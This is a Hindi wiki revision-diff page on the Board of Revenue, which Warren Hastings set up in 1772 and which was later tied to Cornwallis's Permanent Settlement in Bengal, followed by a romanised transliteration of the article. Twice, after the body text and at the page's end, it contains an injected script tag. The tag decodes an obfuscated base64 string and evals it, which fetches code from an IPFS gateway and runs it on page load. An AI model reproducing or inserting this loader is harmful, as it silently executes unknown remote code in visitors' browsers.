Difference between revisions of "बोर्ड ऑफ़ रेवेन्यू"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
'''बोर्ड ऑफ़ रेवेन्यू (राजस्व परिषद)''', का गठन 1772 ई. में [[वारेन हेस्टिंग्स]] ने उस समय किया, जब [[ईस्ट इण्डिया कम्पनी]] दीवानी का कार्य कर रही थी। दो नायब दीवानों के पद समाप्त कर दिये गये और आरम्भ में गवर्नर तथा उसकी परिषद ने राजस्व परिषद के रूप में कार्य करना शुरू किया, किन्तु 1787 ई. में इसे एक बार फिर से पुनर्गठित किया गया। गवर्नर की परिषद का एक सदस्य इसका अध्यक्ष तथा कम्पनी के कुछ वरिष्ठ अधिकारी सदस्य बनाये गये। लार्ड कार्नवालिस ने [[सर जॉन शोर]] की नियुक्ति राजस्व परिषद के अध्यक्ष के रूप में की और उसको [[बंगाल]] में भू-राजस्व की दीर्घकालिक प्रणाली शुरू करने के बारे में रिपोर्ट प्रस्तुत करने की ज़िम्मेदारी सौंपी। शोर बन्दोबस्त के विरुद्ध था, किन्तु लार्ड कार्नवालिस के अनुरोध पर बंगाल में भू-राजस्व की स्थाई प्रणाली चालू कराई गई। इस व्यवस्था से [[कोलकाता|कलकत्ता]] स्थित राजस्व परिषद का महत्व बढ़ गया और एक सुयोग्य अधिकारी की अधीनता में उसने अपना कार्य जारी भी रखा। राजस्व परिषद आज भी कार्यरत है और उसका प्रभारी अधिकारी वरिष्ठ प्रशासकों में से ही एक होता है। इसका सम्बन्ध मुख्यत: माल के मामलों में ही रहता है।  
+
[[चित्र: Board_of_revenue.JPG|right|thumb|250px|उत्तर प्रदेश की राजधानी में स्थित बोर्ड ऑफ़ रेवेन्यू (राजस्व परिषद) का कार्यालय]]
 +
 
 +
'''बोर्ड ऑफ़ रेवेन्यू (राजस्व परिषद)''', का गठन 1772 ई. में [[वारेन हेस्टिंग्स]] ने उस समय किया, जब [[ईस्ट इण्डिया कम्पनी]] दीवानी का कार्य कर रही थी। दो नायब दीवानों के पद समाप्त कर दिये गये और आरम्भ में गवर्नर तथा उसकी परिषद ने राजस्व परिषद के रूप में कार्य करना शुरू किया, किन्तु 1787 ई. में इसे एक बार फिर से पुनर्गठित किया गया। गवर्नर की परिषद का एक सदस्य इसका अध्यक्ष तथा कम्पनी के कुछ वरिष्ठ अधिकारी सदस्य बनाये गये। लॉर्ड कार्नवालिस ने [[सर जॉन शोर]] की नियुक्ति राजस्व परिषद के अध्यक्ष के रूप में की और उसको [[बंगाल]] में [[स्थाई बन्दोबस्त]] की दीर्घकालिक प्रणाली शुरू करने के बारे में रिपोर्ट प्रस्तुत करने की ज़िम्मेदारी सौंपी। शोर बन्दोबस्त के विरुद्ध था, किन्तु लॉर्ड कार्नवालिस के अनुरोध पर बंगाल में भू-राजस्व की स्थाई प्रणाली चालू कराई गई। इस व्यवस्था से [[कोलकाता|कलकत्ता]] स्थित राजस्व परिषद का महत्त्व बढ़ गया और एक सुयोग्य अधिकारी की अधीनता में उसने अपना कार्य जारी भी रखा। राजस्व परिषद आज भी कार्यरत है और उसका प्रभारी अधिकारी वरिष्ठ प्रशासकों में से ही एक होता है। इसका सम्बन्ध मुख्यत: माल के मामलों में ही रहता है।  
 
 
 
 
  
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 9: Line 12:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
(पुस्तक 'भारतीय इतिहास कोश') पृष्ठ संख्या-299
 
(पुस्तक 'भारतीय इतिहास कोश') पृष्ठ संख्या-299
 
<references/>
 
<references/>
 +
==संबंधित लेख==
 +
{{औपनिवेशिक काल}}
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 
[[Category:औपनिवेशिक काल]]
 
[[Category:औपनिवेशिक काल]]
 
__INDEX__
 
__INDEX__

Latest revision as of 15:28, 8 September 2012

right|thumb|250px|uttar pradesh ki rajadhani mean sthit bord aauf revenyoo (rajasv parishad) ka karyalay

bord aauf revenyoo (rajasv parishad), ka gathan 1772 ee. mean varen hestiangs ne us samay kiya, jab eest indiya kampani divani ka kary kar rahi thi. do nayab divanoan ke pad samapt kar diye gaye aur arambh mean gavarnar tatha usaki parishad ne rajasv parishad ke roop mean kary karana shuroo kiya, kintu 1787 ee. mean ise ek bar phir se punargathit kiya gaya. gavarnar ki parishad ka ek sadasy isaka adhyaksh tatha kampani ke kuchh varishth adhikari sadasy banaye gaye. l aaurd karnavalis ne sar j aaun shor ki niyukti rajasv parishad ke adhyaksh ke roop mean ki aur usako bangal mean sthaee bandobast ki dirghakalik pranali shuroo karane ke bare mean riport prastut karane ki zimmedari sauanpi. shor bandobast ke viruddh tha, kintu l aaurd karnavalis ke anurodh par bangal mean bhoo-rajasv ki sthaee pranali chaloo karaee gee. is vyavastha se kalakatta sthit rajasv parishad ka mahattv badh gaya aur ek suyogy adhikari ki adhinata mean usane apana kary jari bhi rakha. rajasv parishad aj bhi karyarat hai aur usaka prabhari adhikari varishth prashasakoan mean se hi ek hota hai. isaka sambandh mukhyat: mal ke mamaloan mean hi rahata hai.  

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

(pustak 'bharatiy itihas kosh') prishth sankhya-299

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>